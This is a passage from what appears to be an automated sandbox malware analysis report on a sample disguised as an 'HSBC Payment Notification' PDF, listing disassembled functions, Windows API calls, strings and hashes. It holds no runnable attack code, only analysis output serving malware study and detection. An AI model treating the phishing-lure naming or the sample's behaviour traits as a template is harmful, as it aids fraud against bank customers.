                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                                    • Opcode ID: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
                                                                                                                                                    • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                                                                                                                    • Opcode Fuzzy Hash: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
                                                                                                                                                    • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                                                                                                                                    Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                                                                                                                      • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                                                                                                                      • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                                                                                                                      • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                    • API String ID: 537147316-1018226102
                                                                                                                                                    • Opcode ID: 0c4d52e0273e1169512128656472f71c6a5450d291fb830b4ecc7d3d703b207e
                                                                                                                                                    • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                                                                                                                    • Opcode Fuzzy Hash: 0c4d52e0273e1169512128656472f71c6a5450d291fb830b4ecc7d3d703b207e
                                                                                                                                                    • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                                                                                                                    Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00462D50
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                                                                                                                    • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                                                                                                                    • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                                                                                                                    • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                                                                                                                    • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                                                                                                                    • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                                                                                                                    • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                                                                                                                    • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00462F56
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                                                                                                                    • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3993528054-0
                                                                                                                                                    • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                                                                                    • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                                                                                                                    • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                                                                                    • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                                                                                                                    Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004788D7
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00478904
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0047890E
                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                                                                                                                    • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00478C35
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                    • String ID: ,,I
                                                                                                                                                    • API String ID: 2395222682-4163367948
                                                                                                                                                    • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                    • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                                                                                                                    • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                    • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                                                                                                                    Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                                                    • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                                                                                                                    • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                                                                                                                    • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                                                                                                                    • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                                                                                                                    Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                      • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString$_memmove
                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                    • API String ID: 2279737902-1007645807
                                                                                                                                                    • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                                                                                    • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                                                                                                                    • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                                                                                                                    • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                                                                                                                    Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                    • API String ID: 208665112-3771769585
                                                                                                                                                    • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                                                                                                    • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                                                                                                                    • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                                                                                                                                                    • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                                                                                                                    Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM ref: 00464F7A
                                                                                                                                                      • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                                                                                                                    • SetActiveWindow.USER32 ref: 0046500B
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00465043
                                                                                                                                                    • IsWindow.USER32 ref: 0046504F
                                                                                                                                                    • EndDialog.USER32(00000000), ref: 00465060
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                    • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                                                                                    • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                                                                                                                    • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                                                                                                                    • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                                                                                                                                    Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                    • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                                                                                    • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                                                                                                                                    • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                                                                                                                    • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                                                                                                                                    Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                                                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                                    • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                                                                                    • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                                                                                                                    • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                                                                                                                    • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                                                                                                                    Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 004021D3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                    • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                                                                                    • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
